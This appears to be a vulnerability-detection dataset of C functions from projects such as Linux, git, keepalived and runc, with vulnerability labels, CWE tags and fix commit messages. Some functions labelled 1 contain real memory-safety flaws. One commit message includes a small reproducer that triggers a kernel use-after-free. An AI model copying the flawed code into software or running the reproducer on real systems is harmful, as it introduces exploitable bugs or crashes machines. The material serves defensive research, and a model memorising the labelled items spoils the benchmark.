SFS_Expression(parser);
SFS_AddString(parser, ".");
SFS_Identifier(parser);
SFS_AddString(parser, "(");
SFS_Params(parser);
SFS_AddString(parser, ")");
}
| 1 |
[
"CWE-476"
] |
gpac
|
4e7736d7ec7bf64026daa611da951993bb42fdaf
| 291,170,795,989,873,960,000,000,000,000,000,000,000 | 10 |
fixed #2238
|
static struct sctp_auth_bytes *sctp_auth_create_key(__u32 key_len, gfp_t gfp)
{
struct sctp_auth_bytes *key;
/* Allocate the shared key */
key = kmalloc(sizeof(struct sctp_auth_bytes) + key_len, gfp);
if (!key)
return NULL;
key->len = key_len;
atomic_set(&key->refcnt, 1);
SCTP_DBG_OBJCNT_INC(keys);
return key;
}
| 1 |
[
"CWE-189"
] |
linux-2.6
|
30c2235cbc477d4629983d440cdc4f496fec9246
| 259,229,604,442,576,920,000,000,000,000,000,000,000 | 15 |
sctp: add verification checks to SCTP_AUTH_KEY option
The structure used for SCTP_AUTH_KEY option contains a
length that needs to be verified to prevent buffer overflow
conditions. Spotted by Eugene Teo <[email protected]>.
Signed-off-by: Vlad Yasevich <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
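A hedged userspace sketch of that verification (simplified types, an arbitrary upper bound standing in for whatever limit the protocol imposes, not the kernel code): check the caller-controlled length before it feeds a "header + len" allocation, so the addition cannot wrap and the later copy cannot overflow.
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

struct auth_bytes {                  /* stand-in for sctp_auth_bytes */
    size_t len;
    unsigned char data[];
};

static struct auth_bytes *create_key(const unsigned char *src, size_t key_len)
{
    struct auth_bytes *key;

    /* Reject absurd or wrap-inducing lengths before allocating and copying. */
    if (key_len > 65536 || key_len > SIZE_MAX - sizeof(*key))
        return NULL;

    key = malloc(sizeof(*key) + key_len);
    if (key == NULL)
        return NULL;
    key->len = key_len;
    memcpy(key->data, src, key_len);
    return key;
}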
|
fifo_close(notify_fifo_t* fifo)
{
if (fifo->fd != -1) {
close(fifo->fd);
fifo->fd = -1;
}
if (fifo->created_fifo)
unlink(fifo->name);
}
| 0 |
[
"CWE-59",
"CWE-61"
] |
keepalived
|
04f2d32871bb3b11d7dc024039952f2fe2750306
| 67,086,455,157,553,780,000,000,000,000,000,000,000 | 9 |
When opening files for write, ensure they aren't symbolic links
Issue #1048 identified that if, for example, a non-privileged user
created a symbolic link from /etc/keepalived.data to /etc/passwd,
writing to /etc/keepalived.data (which could be invoked via DBus)
would cause /etc/passwd to be overwritten.
This commit stops keepalived writing to pathnames where the ultimate
component is a symbolic link, by setting O_NOFOLLOW whenever opening
a file for writing.
This might break some setups, where, for example, /etc/keepalived.data
was a symbolic link to /home/fred/keepalived.data. If this was the case,
instead create a symbolic link from /home/fred/keepalived.data to
/tmp/keepalived.data, so that the file is still accessible via
/home/fred/keepalived.data.
There doesn't appear to be a way around this backward incompatibility,
since even checking if the pathname is a symbolic link prior to opening
for writing would create a race condition.
Signed-off-by: Quentin Armitage <[email protected]>
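A minimal sketch of the pattern, assuming a hypothetical data-file path: pass O_NOFOLLOW when opening for write, so the open fails with ELOOP if the final path component is a symbolic link.
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>

static FILE *open_data_file(const char *path)
{
    /* O_NOFOLLOW makes open() fail with ELOOP if "path" itself is a symlink,
       so a link planted at the expected location cannot redirect the write. */
    int fd = open(path, O_WRONLY | O_CREAT | O_NOFOLLOW | O_CLOEXEC, 0644);
    if (fd < 0) {
        fprintf(stderr, "refusing to write %s: %s\n", path, strerror(errno));
        return NULL;
    }
    return fdopen(fd, "w");
}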
|
static void load_tree(struct tree_entry *root)
{
unsigned char *sha1 = root->versions[1].sha1;
struct object_entry *myoe;
struct tree_content *t;
unsigned long size;
char *buf;
const char *c;
root->tree = t = new_tree_content(8);
if (is_null_sha1(sha1))
return;
myoe = find_object(sha1);
if (myoe && myoe->pack_id != MAX_PACK_ID) {
if (myoe->type != OBJ_TREE)
die("Not a tree: %s", sha1_to_hex(sha1));
t->delta_depth = myoe->depth;
buf = gfi_unpack_entry(myoe, &size);
if (!buf)
die("Can't load tree %s", sha1_to_hex(sha1));
} else {
enum object_type type;
buf = read_sha1_file(sha1, &type, &size);
if (!buf || type != OBJ_TREE)
die("Can't load tree %s", sha1_to_hex(sha1));
}
c = buf;
while (c != (buf + size)) {
struct tree_entry *e = new_tree_entry();
if (t->entry_count == t->entry_capacity)
root->tree = t = grow_tree_content(t, t->entry_count);
t->entries[t->entry_count++] = e;
e->tree = NULL;
c = get_mode(c, &e->versions[1].mode);
if (!c)
die("Corrupt mode in %s", sha1_to_hex(sha1));
e->versions[0].mode = e->versions[1].mode;
e->name = to_atom(c, strlen(c));
c += e->name->str_len + 1;
hashcpy(e->versions[0].sha1, (unsigned char *)c);
hashcpy(e->versions[1].sha1, (unsigned char *)c);
c += 20;
}
free(buf);
}
| 0 |
[
"CWE-119",
"CWE-787"
] |
git
|
34fa79a6cde56d6d428ab0d3160cb094ebad3305
| 155,325,209,967,351,500,000,000,000,000,000,000,000 | 49 |
prefer memcpy to strcpy
When we already know the length of a string (e.g., because
we just malloc'd to fit it), it's nicer to use memcpy than
strcpy, as it makes it more obvious that we are not going to
overflow the buffer (because the size we pass matches the
size in the allocation).
This also eliminates calls to strcpy, which make auditing
the code base harder.
Signed-off-by: Jeff King <[email protected]>
Signed-off-by: Junio C Hamano <[email protected]>
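As a small illustration of the pattern (not code from git itself): once the length has been computed for the allocation, reuse it for the copy so the bounds are visibly the same.
#include <stdlib.h>
#include <string.h>

static char *dup_name(const char *src)
{
    size_t len = strlen(src);
    char *dst = malloc(len + 1);
    if (dst == NULL)
        return NULL;
    /* The same "len" that sized the buffer also bounds the copy (+1 for the
       NUL), which is the property that makes memcpy easier to audit. */
    memcpy(dst, src, len + 1);
    return dst;
}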
|
pkinit_fini_req_crypto(pkinit_req_crypto_context req_cryptoctx)
{
if (req_cryptoctx == NULL)
return;
pkiDebug("%s: freeing ctx at %p\n", __FUNCTION__, req_cryptoctx);
if (req_cryptoctx->dh != NULL)
DH_free(req_cryptoctx->dh);
if (req_cryptoctx->received_cert != NULL)
X509_free(req_cryptoctx->received_cert);
free(req_cryptoctx);
}
| 0 |
[
"CWE-119",
"CWE-787"
] |
krb5
|
fbb687db1088ddd894d975996e5f6a4252b9a2b4
| 209,654,669,565,724,760,000,000,000,000,000,000,000 | 13 |
Fix PKINIT cert matching data construction
Rewrite X509_NAME_oneline_ex() and its call sites to use dynamic
allocation and to perform proper error checking.
ticket: 8617
target_version: 1.16
target_version: 1.15-next
target_version: 1.14-next
tags: pullup
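The "dynamic allocation with proper error checking" idea can be sketched as follows (a hypothetical helper, not the PKINIT code): size the buffer from the actual data instead of copying into a fixed-length array, and report allocation failure to the caller.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static char *join_name(const char *a, const char *b)
{
    size_t need = strlen(a) + strlen(b) + 2;   /* separator + NUL */
    char *out = malloc(need);
    if (out == NULL)
        return NULL;                           /* propagate the failure */
    snprintf(out, need, "%s/%s", a, b);
    return out;
}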
|
webSocketsHandshake(rfbClientPtr cl, char *scheme)
{
char *buf, *response, *line;
int n, linestart = 0, len = 0, llen, base64 = TRUE;
char prefix[5], trailer[17];
char *path = NULL, *host = NULL, *origin = NULL, *protocol = NULL;
char *key1 = NULL, *key2 = NULL, *key3 = NULL;
char *sec_ws_origin = NULL;
char *sec_ws_key = NULL;
char sec_ws_version = 0;
ws_ctx_t *wsctx = NULL;
buf = (char *) malloc(WEBSOCKETS_MAX_HANDSHAKE_LEN);
if (!buf) {
rfbLogPerror("webSocketsHandshake: malloc");
return FALSE;
}
response = (char *) malloc(WEBSOCKETS_MAX_HANDSHAKE_LEN);
if (!response) {
free(buf);
rfbLogPerror("webSocketsHandshake: malloc");
return FALSE;
}
while (len < WEBSOCKETS_MAX_HANDSHAKE_LEN-1) {
if ((n = rfbReadExactTimeout(cl, buf+len, 1,
WEBSOCKETS_CLIENT_SEND_WAIT_MS)) <= 0) {
if ((n < 0) && (errno == ETIMEDOUT)) {
break;
}
if (n == 0)
rfbLog("webSocketsHandshake: client gone\n");
else
rfbLogPerror("webSocketsHandshake: read");
free(response);
free(buf);
return FALSE;
}
len += 1;
llen = len - linestart;
if (((llen >= 2)) && (buf[len-1] == '\n')) {
line = buf+linestart;
if ((llen == 2) && (strncmp("\r\n", line, 2) == 0)) {
if (key1 && key2) {
if ((n = rfbReadExact(cl, buf+len, 8)) <= 0) {
if ((n < 0) && (errno == ETIMEDOUT)) {
break;
}
if (n == 0)
rfbLog("webSocketsHandshake: client gone\n");
else
rfbLogPerror("webSocketsHandshake: read");
free(response);
free(buf);
return FALSE;
}
rfbLog("Got key3\n");
key3 = buf+len;
len += 8;
} else {
buf[len] = '\0';
}
break;
} else if ((llen >= 16) && ((strncmp("GET ", line, min(llen,4))) == 0)) {
/* 16 = 4 ("GET ") + 1 ("/.*") + 11 (" HTTP/1.1\r\n") */
path = line+4;
buf[len-11] = '\0'; /* Trim trailing " HTTP/1.1\r\n" */
cl->wspath = strdup(path);
/* rfbLog("Got path: %s\n", path); */
} else if ((strncasecmp("host: ", line, min(llen,6))) == 0) {
host = line+6;
buf[len-2] = '\0';
/* rfbLog("Got host: %s\n", host); */
} else if ((strncasecmp("origin: ", line, min(llen,8))) == 0) {
origin = line+8;
buf[len-2] = '\0';
/* rfbLog("Got origin: %s\n", origin); */
} else if ((strncasecmp("sec-websocket-key1: ", line, min(llen,20))) == 0) {
key1 = line+20;
buf[len-2] = '\0';
/* rfbLog("Got key1: %s\n", key1); */
} else if ((strncasecmp("sec-websocket-key2: ", line, min(llen,20))) == 0) {
key2 = line+20;
buf[len-2] = '\0';
/* rfbLog("Got key2: %s\n", key2); */
/* HyBI */
} else if ((strncasecmp("sec-websocket-protocol: ", line, min(llen,24))) == 0) {
protocol = line+24;
buf[len-2] = '\0';
rfbLog("Got protocol: %s\n", protocol);
} else if ((strncasecmp("sec-websocket-origin: ", line, min(llen,22))) == 0) {
sec_ws_origin = line+22;
buf[len-2] = '\0';
} else if ((strncasecmp("sec-websocket-key: ", line, min(llen,19))) == 0) {
sec_ws_key = line+19;
buf[len-2] = '\0';
} else if ((strncasecmp("sec-websocket-version: ", line, min(llen,23))) == 0) {
sec_ws_version = strtol(line+23, NULL, 10);
buf[len-2] = '\0';
}
linestart = len;
}
}
if (!(path && host && (origin || sec_ws_origin))) {
rfbErr("webSocketsHandshake: incomplete client handshake\n");
free(response);
free(buf);
return FALSE;
}
if ((protocol) && (strstr(protocol, "binary"))) {
if (! sec_ws_version) {
rfbErr("webSocketsHandshake: 'binary' protocol not supported with Hixie\n");
free(response);
free(buf);
return FALSE;
}
rfbLog(" - webSocketsHandshake: using binary/raw encoding\n");
base64 = FALSE;
protocol = "binary";
} else {
rfbLog(" - webSocketsHandshake: using base64 encoding\n");
base64 = TRUE;
if ((protocol) && (strstr(protocol, "base64"))) {
protocol = "base64";
} else {
protocol = "";
}
}
/*
* Generate the WebSockets server response based on the the headers sent
* by the client.
*/
if (sec_ws_version) {
char accept[B64LEN(SHA1_HASH_SIZE) + 1];
rfbLog(" - WebSockets client version hybi-%02d\n", sec_ws_version);
webSocketsGenSha1Key(accept, sizeof(accept), sec_ws_key);
if(strlen(protocol) > 0)
len = snprintf(response, WEBSOCKETS_MAX_HANDSHAKE_LEN,
SERVER_HANDSHAKE_HYBI, accept, protocol);
else
len = snprintf(response, WEBSOCKETS_MAX_HANDSHAKE_LEN,
SERVER_HANDSHAKE_HYBI_NO_PROTOCOL, accept);
} else {
/* older hixie handshake, this could be removed if
* a final standard is established */
if (!(key1 && key2 && key3)) {
rfbLog(" - WebSockets client version hixie-75\n");
prefix[0] = '\0';
trailer[0] = '\0';
} else {
rfbLog(" - WebSockets client version hixie-76\n");
snprintf(prefix, 5, "Sec-");
webSocketsGenMd5(trailer, key1, key2, key3);
}
len = snprintf(response, WEBSOCKETS_MAX_HANDSHAKE_LEN,
SERVER_HANDSHAKE_HIXIE, prefix, origin, prefix, scheme,
host, path, prefix, protocol, trailer);
}
if (rfbWriteExact(cl, response, len) < 0) {
rfbErr("webSocketsHandshake: failed sending WebSockets response\n");
free(response);
free(buf);
return FALSE;
}
/* rfbLog("webSocketsHandshake: %s\n", response); */
free(response);
free(buf);
wsctx = calloc(1, sizeof(ws_ctx_t));
if (sec_ws_version) {
wsctx->version = WEBSOCKETS_VERSION_HYBI;
wsctx->encode = webSocketsEncodeHybi;
wsctx->decode = webSocketsDecodeHybi;
} else {
wsctx->version = WEBSOCKETS_VERSION_HIXIE;
wsctx->encode = webSocketsEncodeHixie;
wsctx->decode = webSocketsDecodeHixie;
}
wsctx->base64 = base64;
hybiDecodeCleanup(wsctx);
cl->wsctx = (wsCtx *)wsctx;
return TRUE;
}
| 0 |
[
"CWE-787"
] |
libvncserver
|
aac95a9dcf4bbba87b76c72706c3221a842ca433
| 272,130,371,408,637,680,000,000,000,000,000,000,000 | 192 |
fix overflow and refactor websockets decode (Hybi)
fix critical heap-based buffer overflow which allowed easy modification
of a return address via an overwritten function pointer
fix bug causing connections to fail due a "one websocket frame = one
ws_read" assumption, which failed with LibVNCServer-0.9.11
refactor websocket Hybi decode to use a simple state machine for
decoding of websocket frames
|
int read_line(char *buf, int size)
{
char c, UNINIT_VAR(last_quote), last_char= 0;
char *p= buf, *buf_end= buf + size - 1;
int skip_char= 0;
my_bool have_slash= FALSE;
enum {R_NORMAL, R_Q, R_SLASH_IN_Q,
R_COMMENT, R_LINE_START} state= R_LINE_START;
DBUG_ENTER("read_line");
start_lineno= cur_file->lineno;
DBUG_PRINT("info", ("Starting to read at lineno: %d", start_lineno));
for (; p < buf_end ;)
{
skip_char= 0;
c= my_getc(cur_file->file);
if (feof(cur_file->file))
{
found_eof:
if (cur_file->file != stdin)
{
fclose(cur_file->file);
cur_file->file= 0;
}
my_free(cur_file->file_name);
cur_file->file_name= 0;
if (cur_file == file_stack)
{
/* We're back at the first file, check if
all { have matching }
*/
if (cur_block != block_stack)
die("Missing end of block");
*p= 0;
DBUG_PRINT("info", ("end of file at line %d", cur_file->lineno));
DBUG_RETURN(1);
}
cur_file--;
start_lineno= cur_file->lineno;
continue;
}
if (c == '\n')
{
/* Line counting is independent of state */
cur_file->lineno++;
/* Convert cr/lf to lf */
if (p != buf && *(p-1) == '\r')
p--;
}
switch(state) {
case R_NORMAL:
if (end_of_query(c))
{
*p= 0;
DBUG_PRINT("exit", ("Found delimiter '%s' at line %d",
delimiter, cur_file->lineno));
DBUG_RETURN(0);
}
else if ((c == '{' &&
(!my_strnncoll_simple(charset_info, (const uchar*) "while", 5,
(uchar*) buf, min(5, p - buf), 0) ||
!my_strnncoll_simple(charset_info, (const uchar*) "if", 2,
(uchar*) buf, min(2, p - buf), 0))))
{
/* Only if and while commands can be terminated by { */
*p++= c;
*p= 0;
DBUG_PRINT("exit", ("Found '{' indicating start of block at line %d",
cur_file->lineno));
DBUG_RETURN(0);
}
else if (c == '\'' || c == '"' || c == '`')
{
if (! have_slash)
{
last_quote= c;
state= R_Q;
}
}
have_slash= (c == '\\');
break;
case R_COMMENT:
if (c == '\n')
{
/* Comments are terminated by newline */
*p= 0;
DBUG_PRINT("exit", ("Found newline in comment at line: %d",
cur_file->lineno));
DBUG_RETURN(0);
}
break;
case R_LINE_START:
if (c == '#' || c == '-')
{
/* A # or - in the first position of the line - this is a comment */
state = R_COMMENT;
}
else if (my_isspace(charset_info, c))
{
if (c == '\n')
{
if (last_char == '\n')
{
/* Two new lines in a row, return empty line */
DBUG_PRINT("info", ("Found two new lines in a row"));
*p++= c;
*p= 0;
DBUG_RETURN(0);
}
/* Query hasn't started yet */
start_lineno= cur_file->lineno;
DBUG_PRINT("info", ("Query hasn't started yet, start_lineno: %d",
start_lineno));
}
/* Skip all space at begining of line */
skip_char= 1;
}
else if (end_of_query(c))
{
*p= 0;
DBUG_PRINT("exit", ("Found delimiter '%s' at line: %d",
delimiter, cur_file->lineno));
DBUG_RETURN(0);
}
else if (c == '}')
{
/* A "}" need to be by itself in the begining of a line to terminate */
*p++= c;
*p= 0;
DBUG_PRINT("exit", ("Found '}' in begining of a line at line: %d",
cur_file->lineno));
DBUG_RETURN(0);
}
else if (c == '\'' || c == '"' || c == '`')
{
last_quote= c;
state= R_Q;
}
else
state= R_NORMAL;
break;
case R_Q:
if (c == last_quote)
state= R_NORMAL;
else if (c == '\\')
state= R_SLASH_IN_Q;
break;
case R_SLASH_IN_Q:
state= R_Q;
break;
}
last_char= c;
if (!skip_char)
{
/* Could be a multibyte character */
/* This code is based on the code in "sql_load.cc" */
#ifdef USE_MB
int charlen = my_mbcharlen(charset_info, (unsigned char) c);
/* We give up if multibyte character is started but not */
/* completed before we pass buf_end */
if ((charlen > 1) && (p + charlen) <= buf_end)
{
int i;
char* mb_start = p;
*p++ = c;
for (i= 1; i < charlen; i++)
{
c= my_getc(cur_file->file);
if (feof(cur_file->file))
goto found_eof;
*p++ = c;
}
if (! my_ismbchar(charset_info, mb_start, p))
{
/* It was not a multiline char, push back the characters */
/* We leave first 'c', i.e. pretend it was a normal char */
while (p-1 > mb_start)
my_ungetc(*--p);
}
}
else
#endif
*p++= c;
}
}
die("The input buffer is too small for this query.x\n" \
"check your query or increase MAX_QUERY and recompile");
DBUG_RETURN(0);
}
| 0 |
[
"CWE-295"
] |
mysql-server
|
b3e9211e48a3fb586e88b0270a175d2348935424
| 142,270,015,796,639,350,000,000,000,000,000,000,000 | 205 |
WL#9072: Backport WL#8785 to 5.5
|
static int is_self_cloned(void)
{
int fd, ret, is_cloned = 0;
fd = open("/proc/self/exe", O_RDONLY|O_CLOEXEC);
if (fd < 0)
return -ENOTRECOVERABLE;
#ifdef HAVE_MEMFD_CREATE
ret = fcntl(fd, F_GET_SEALS);
is_cloned = (ret == RUNC_MEMFD_SEALS);
#else
struct stat statbuf = {0};
ret = fstat(fd, &statbuf);
if (ret >= 0)
is_cloned = (statbuf.st_nlink == 0);
#endif
close(fd);
return is_cloned;
}
| 0 |
[
"CWE-78",
"CWE-216"
] |
runc
|
0a8e4117e7f715d5fbeef398405813ce8e88558b
| 188,370,125,591,670,300,000,000,000,000,000,000,000 | 20 |
nsenter: clone /proc/self/exe to avoid exposing host binary to container
There are quite a few circumstances where /proc/self/exe pointing to a
pretty important container binary is a _bad_ thing, so to avoid this we
have to make a copy (preferably doing self-clean-up and not being
writeable).
We require memfd_create(2) -- though there is an O_TMPFILE fallback --
but we can always extend this to use a scratch MNT_DETACH overlayfs or
tmpfs. The main downside to this approach is no page-cache sharing for
the runc binary (which overlayfs would give us) but this is far less
complicated.
This is only done during nsenter so that it happens transparently to the
Go code, and any libcontainer users benefit from it. This also makes
ExtraFiles and --preserve-fds handling trivial (because we don't need to
worry about it).
Fixes: CVE-2019-5736
Co-developed-by: Christian Brauner <[email protected]>
Signed-off-by: Aleksa Sarai <[email protected]>
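A rough userspace illustration of the cloning idea (not runc's nsenter code; error-path cleanup trimmed): copy /proc/self/exe into a memfd and seal it so the copy can never be modified, then re-execute from that fd later.
#define _GNU_SOURCE
#include <fcntl.h>
#include <sys/mman.h>
#include <unistd.h>

static int clone_self_exe(void)
{
    int memfd = memfd_create("cloned-binary", MFD_CLOEXEC | MFD_ALLOW_SEALING);
    int self = open("/proc/self/exe", O_RDONLY | O_CLOEXEC);
    char buf[4096];
    ssize_t n;

    if (memfd < 0 || self < 0)
        return -1;
    while ((n = read(self, buf, sizeof(buf))) > 0)
        if (write(memfd, buf, (size_t)n) != n)
            return -1;
    close(self);
    /* Seal the copy: it can no longer be written, grown, shrunk or resealed,
       so the container only ever sees this immutable clone rather than the
       host binary behind /proc/self/exe. */
    if (fcntl(memfd, F_ADD_SEALS,
              F_SEAL_SEAL | F_SEAL_SHRINK | F_SEAL_GROW | F_SEAL_WRITE) < 0)
        return -1;
    return memfd;                /* suitable for fexecve(2) later */
}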
|
static void con_flush(struct vc_data *vc, unsigned long draw_from,
unsigned long draw_to, int *draw_x)
{
if (*draw_x < 0)
return;
vc->vc_sw->con_putcs(vc, (u16 *)draw_from,
(u16 *)draw_to - (u16 *)draw_from, vc->vc_y, *draw_x);
*draw_x = -1;
}
| 0 |
[
"CWE-416",
"CWE-362"
] |
linux
|
ca4463bf8438b403596edd0ec961ca0d4fbe0220
| 37,163,782,504,220,547,000,000,000,000,000,000,000 | 10 |
vt: vt_ioctl: fix VT_DISALLOCATE freeing in-use virtual console
The VT_DISALLOCATE ioctl can free a virtual console while tty_release()
is still running, causing a use-after-free in con_shutdown(). This
occurs because VT_DISALLOCATE considers a virtual console's
'struct vc_data' to be unused as soon as the corresponding tty's
refcount hits 0. But actually it may still be being closed.
Fix this by making vc_data be reference-counted via the embedded
'struct tty_port'. A newly allocated virtual console has refcount 1.
Opening it for the first time increments the refcount to 2. Closing it
for the last time decrements the refcount (in tty_operations::cleanup()
so that it happens late enough), as does VT_DISALLOCATE.
Reproducer:
#include <fcntl.h>
#include <linux/vt.h>
#include <sys/ioctl.h>
#include <unistd.h>
int main()
{
if (fork()) {
for (;;)
close(open("/dev/tty5", O_RDWR));
} else {
int fd = open("/dev/tty10", O_RDWR);
for (;;)
ioctl(fd, VT_DISALLOCATE, 5);
}
}
KASAN report:
BUG: KASAN: use-after-free in con_shutdown+0x76/0x80 drivers/tty/vt/vt.c:3278
Write of size 8 at addr ffff88806a4ec108 by task syz_vt/129
CPU: 0 PID: 129 Comm: syz_vt Not tainted 5.6.0-rc2 #11
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS ?-20191223_100556-anatol 04/01/2014
Call Trace:
[...]
con_shutdown+0x76/0x80 drivers/tty/vt/vt.c:3278
release_tty+0xa8/0x410 drivers/tty/tty_io.c:1514
tty_release_struct+0x34/0x50 drivers/tty/tty_io.c:1629
tty_release+0x984/0xed0 drivers/tty/tty_io.c:1789
[...]
Allocated by task 129:
[...]
kzalloc include/linux/slab.h:669 [inline]
vc_allocate drivers/tty/vt/vt.c:1085 [inline]
vc_allocate+0x1ac/0x680 drivers/tty/vt/vt.c:1066
con_install+0x4d/0x3f0 drivers/tty/vt/vt.c:3229
tty_driver_install_tty drivers/tty/tty_io.c:1228 [inline]
tty_init_dev+0x94/0x350 drivers/tty/tty_io.c:1341
tty_open_by_driver drivers/tty/tty_io.c:1987 [inline]
tty_open+0x3ca/0xb30 drivers/tty/tty_io.c:2035
[...]
Freed by task 130:
[...]
kfree+0xbf/0x1e0 mm/slab.c:3757
vt_disallocate drivers/tty/vt/vt_ioctl.c:300 [inline]
vt_ioctl+0x16dc/0x1e30 drivers/tty/vt/vt_ioctl.c:818
tty_ioctl+0x9db/0x11b0 drivers/tty/tty_io.c:2660
[...]
Fixes: 4001d7b7fc27 ("vt: push down the tty lock so we can see what is left to tackle")
Cc: <[email protected]> # v3.4+
Reported-by: [email protected]
Acked-by: Jiri Slaby <[email protected]>
Signed-off-by: Eric Biggers <[email protected]>
Link: https://lore.kernel.org/r/[email protected]
Signed-off-by: Greg Kroah-Hartman <[email protected]>
|
xmlSchemaResolveUnionMemberTypes(xmlSchemaParserCtxtPtr ctxt,
xmlSchemaTypePtr type)
{
xmlSchemaTypeLinkPtr link, lastLink, newLink;
xmlSchemaTypePtr memberType;
/*
* SPEC (1) "If the <union> alternative is chosen, then [Definition:]
* define the explicit members as the type definitions `resolved`
* to by the items in the `actual value` of the memberTypes [attribute],
* if any, followed by the type definitions corresponding to the
* <simpleType>s among the [children] of <union>, if any."
*/
/*
* Resolve references.
*/
link = type->memberTypes;
lastLink = NULL;
while (link != NULL) {
const xmlChar *name, *nsName;
name = ((xmlSchemaQNameRefPtr) link->type)->name;
nsName = ((xmlSchemaQNameRefPtr) link->type)->targetNamespace;
memberType = xmlSchemaGetType(ctxt->schema, name, nsName);
if ((memberType == NULL) || (! WXS_IS_SIMPLE(memberType))) {
xmlSchemaPResCompAttrErr(ctxt, XML_SCHEMAP_SRC_RESOLVE,
WXS_BASIC_CAST type, type->node, "memberTypes",
name, nsName, XML_SCHEMA_TYPE_SIMPLE, NULL);
/*
* Remove the member type link.
*/
if (lastLink == NULL)
type->memberTypes = link->next;
else
lastLink->next = link->next;
newLink = link;
link = link->next;
xmlFree(newLink);
} else {
link->type = memberType;
lastLink = link;
link = link->next;
}
}
/*
* Add local simple types,
*/
memberType = type->subtypes;
while (memberType != NULL) {
link = (xmlSchemaTypeLinkPtr) xmlMalloc(sizeof(xmlSchemaTypeLink));
if (link == NULL) {
xmlSchemaPErrMemory(ctxt, "allocating a type link", NULL);
return (-1);
}
link->type = memberType;
link->next = NULL;
if (lastLink == NULL)
type->memberTypes = link;
else
lastLink->next = link;
lastLink = link;
memberType = memberType->next;
}
return (0);
}
| 0 |
[
"CWE-134"
] |
libxml2
|
4472c3a5a5b516aaf59b89be602fbce52756c3e9
| 130,784,828,568,431,760,000,000,000,000,000,000,000 | 67 |
Fix some format string warnings with possible format string vulnerability
For https://bugzilla.gnome.org/show_bug.cgi?id=761029
Decorate every method in libxml2 with the appropriate
LIBXML_ATTR_FORMAT(fmt,args) macro and add some cleanups
following the reports.
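For context, the kind of macro being applied looks roughly like this (a generic sketch, not the exact libxml2 definition): with the format attribute in place, the compiler can flag callers that pass user-controlled data as the format string.
#include <stdarg.h>
#include <stdio.h>

#if defined(__GNUC__)
# define ATTR_FORMAT(fmt, args) __attribute__((format(printf, fmt, args)))
#else
# define ATTR_FORMAT(fmt, args)
#endif

static void report(const char *fmt, ...) ATTR_FORMAT(1, 2);

static void report(const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vfprintf(stderr, fmt, ap);
    va_end(ap);
}

/* report(user_input);        would now draw a -Wformat-security warning
   report("%s", user_input);  is the safe, warning-free form               */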
|
static int __init debug_guardpage_minorder_setup(char *buf)
{
unsigned long res;
if (kstrtoul(buf, 10, &res) < 0 || res > MAX_ORDER / 2) {
pr_err("Bad debug_guardpage_minorder value\n");
return 0;
}
_debug_guardpage_minorder = res;
pr_info("Setting debug_guardpage_minorder to %lu\n", res);
return 0;
}
| 0 |
[] |
linux
|
400e22499dd92613821374c8c6c88c7225359980
| 173,417,973,308,487,900,000,000,000,000,000,000,000 | 12 |
mm: don't warn about allocations which stall for too long
Commit 63f53dea0c98 ("mm: warn about allocations which stall for too
long") was a great step for reducing possibility of silent hang up
problem caused by memory allocation stalls. But this commit reverts it,
for it is possible to trigger OOM lockup and/or soft lockups when many
threads concurrently called warn_alloc() (in order to warn about memory
allocation stalls) due to current implementation of printk(), and it is
difficult to obtain useful information due to limitation of synchronous
warning approach.
Current printk() implementation flushes all pending logs using the
context of a thread which called console_unlock(). printk() should be
able to flush all pending logs eventually unless somebody continues
appending to printk() buffer.
Since warn_alloc() started appending to printk() buffer while waiting
for oom_kill_process() to make forward progress when oom_kill_process()
is processing pending logs, it became possible for warn_alloc() to force
oom_kill_process() loop inside printk(). As a result, warn_alloc()
significantly increased possibility of preventing oom_kill_process()
from making forward progress.
---------- Pseudo code start ----------
Before warn_alloc() was introduced:
retry:
if (mutex_trylock(&oom_lock)) {
while (atomic_read(&printk_pending_logs) > 0) {
atomic_dec(&printk_pending_logs);
print_one_log();
}
// Send SIGKILL here.
mutex_unlock(&oom_lock)
}
goto retry;
After warn_alloc() was introduced:
retry:
if (mutex_trylock(&oom_lock)) {
while (atomic_read(&printk_pending_logs) > 0) {
atomic_dec(&printk_pending_logs);
print_one_log();
}
// Send SIGKILL here.
mutex_unlock(&oom_lock)
} else if (waited_for_10seconds()) {
atomic_inc(&printk_pending_logs);
}
goto retry;
---------- Pseudo code end ----------
Although waited_for_10seconds() becomes true once per 10 seconds,
unbounded number of threads can call waited_for_10seconds() at the same
time. Also, since threads doing waited_for_10seconds() keep doing
almost busy loop, the thread doing print_one_log() can use little CPU
resource. Therefore, this situation can be simplified like
---------- Pseudo code start ----------
retry:
if (mutex_trylock(&oom_lock)) {
while (atomic_read(&printk_pending_logs) > 0) {
atomic_dec(&printk_pending_logs);
print_one_log();
}
// Send SIGKILL here.
mutex_unlock(&oom_lock)
} else {
atomic_inc(&printk_pending_logs);
}
goto retry;
---------- Pseudo code end ----------
when printk() is called faster than print_one_log() can process a log.
One of possible mitigation would be to introduce a new lock in order to
make sure that no other series of printk() (either oom_kill_process() or
warn_alloc()) can append to printk() buffer when one series of printk()
(either oom_kill_process() or warn_alloc()) is already in progress.
Such serialization will also help obtaining kernel messages in readable
form.
---------- Pseudo code start ----------
retry:
if (mutex_trylock(&oom_lock)) {
mutex_lock(&oom_printk_lock);
while (atomic_read(&printk_pending_logs) > 0) {
atomic_dec(&printk_pending_logs);
print_one_log();
}
// Send SIGKILL here.
mutex_unlock(&oom_printk_lock);
mutex_unlock(&oom_lock)
} else {
if (mutex_trylock(&oom_printk_lock)) {
atomic_inc(&printk_pending_logs);
mutex_unlock(&oom_printk_lock);
}
}
goto retry;
---------- Pseudo code end ----------
But this commit does not go that direction, for we don't want to
introduce a new lock dependency, and we unlikely be able to obtain
useful information even if we serialized oom_kill_process() and
warn_alloc().
Synchronous approach is prone to unexpected results (e.g. too late [1],
too frequent [2], overlooked [3]). As far as I know, warn_alloc() never
helped with providing information other than "something is going wrong".
I want to consider asynchronous approach which can obtain information
during stalls with possibly relevant threads (e.g. the owner of
oom_lock and kswapd-like threads) and serve as a trigger for actions
(e.g. turn on/off tracepoints, ask libvirt daemon to take a memory dump
of stalling KVM guest for diagnostic purpose).
This commit temporarily loses the ability to report e.g. an OOM lockup caused
by being unable to invoke the OOM killer for a !__GFP_FS allocation request.
But an asynchronous approach will be able to detect such a situation and emit
a warning. Thus, let's remove warn_alloc().
[1] https://bugzilla.kernel.org/show_bug.cgi?id=192981
